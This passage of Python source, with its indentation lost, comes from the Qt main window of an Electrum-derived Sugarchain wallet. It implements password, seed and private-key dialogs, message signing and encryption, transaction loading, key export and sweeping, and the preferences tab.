sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import STO_EV_XPUB_PW
if self.wallet.get_available_storage_encryption_version() == STO_EV_XPUB_PW:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(str(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
tab = self.tabs.currentWidget()
#if hasattr(tab, 'searchable_list'):
# tab.searchable_list.toggle_toolbar()
#return
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_master_public_keys(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.storage.get('wallet_type', '')
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
def label(key):
if isinstance(self.wallet, Multisig_Wallet):
return _("cosigner") + f' {key+1} ( keystore: {keystore_types[key]} )'
return ''
labels = [label(i) for i in range(len(mpk_list))]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
self.close()
if r:
self.show_error(_("Wallet removed: {}").format(basename))
else:
self.show_error(_("Wallet file not found: {}").format(basename))
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(str(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk, redeem_script = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(str(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
if redeem_script:
vbox.addWidget(QLabel(_("Redeem Script") + ':'))
rds_e = ShowQRTextEdit(text=redeem_script)
rds_e.addCopyButton(self.app)
vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, txt):
from electrum.transaction import tx_from_str
try:
tx = tx_from_str(txt)
return Transaction(tx)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + str(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(str(e))
return
if not data:
return
# if the user scanned a payment URI (sugarchain: scheme)
if str(data).startswith("sugarchain:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
try:
data = bh2u(bitcoin.base_decode(data, length=None, base=43))
except BaseException as e:
self.show_error((_('Could not decode QR code')+':\n{}').format(repr(e)))
return
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self):
fileName = self.getOpenFileName(_("Select your transaction file"), "*.txn")
if not fileName:
return
try:
with open(fileName, "r") as f:
file_content = f.read()
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason), title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + str(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-sugar-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
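# Runs on a worker thread: export one key at a time (throttled by a short sleep), emit
# computing_privkeys_signal so the dialog can show progress, and stop early if the dialog is
# closed; show_privkeys_signal hands the finished result back to the GUI thread.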
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)[0]
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(str(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
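# The Sweep button stays disabled until both a valid destination address and at least one
# parseable private key have been entered; the address field is tinted red while it is invalid.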
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {str(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(str(e))
return
self.do_clear()
self.tx_external_keypairs = keypairs
self.spend_coins(coins)
self.payto_e.setText(addr)
self.spend_max()
self.payto_e.setFrozen(True)
self.amount_e.setFrozen(True)
self.warn_if_watching_only()
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
self.need_restart = False
d = WindowModalDialog(self, _('Preferences'))
vbox = QVBoxLayout()
tabs = QTabWidget()
gui_widgets = []
fee_widgets = []
tx_widgets = []
id_widgets = []
# language
lang_help = _('Select which language is used in the GUI (after restart).')
lang_label = HelpLabel(_('Language') + ':', lang_help)
lang_combo = QComboBox()
from electrum.i18n import languages
lang_combo.addItems(list(languages.values()))
lang_keys = list(languages.keys())
lang_cur_setting = self.config.get("language", '')
try:
index = lang_keys.index(lang_cur_setting)
except ValueError: # not in list
index = 0
lang_combo.setCurrentIndex(index)
if not self.config.is_modifiable('language'):
for w in [lang_combo, lang_label]: w.setEnabled(False)
def on_lang(x):
lang_request = list(languages.keys())[lang_combo.currentIndex()]
if lang_request != self.config.get('language'):
self.config.set_key("language", lang_request, True)
self.need_restart = True
lang_combo.currentIndexChanged.connect(on_lang)
gui_widgets.append((lang_label, lang_combo))
nz_help = _('Number of zeros displayed after the decimal point. For example, if this is set to 2, "1." will be displayed as "1.00"')
nz_label = HelpLabel(_('Zeros after decimal point') + ':', nz_help)
nz = QSpinBox()
nz.setMinimum(0)
nz.setMaximum(self.decimal_point)
nz.setValue(self.num_zeros)
if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', True)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 SUGAR = 1000 mSUGAR. 1 mSUGAR = 1000 uSUGAR. 1 uSUGAR = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
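# Changing the base unit captures the amounts currently entered, switches decimal_point,
# refreshes the lists, then writes the same amounts back so each edit is re-rendered in the new unit.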
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'default'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transaction fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
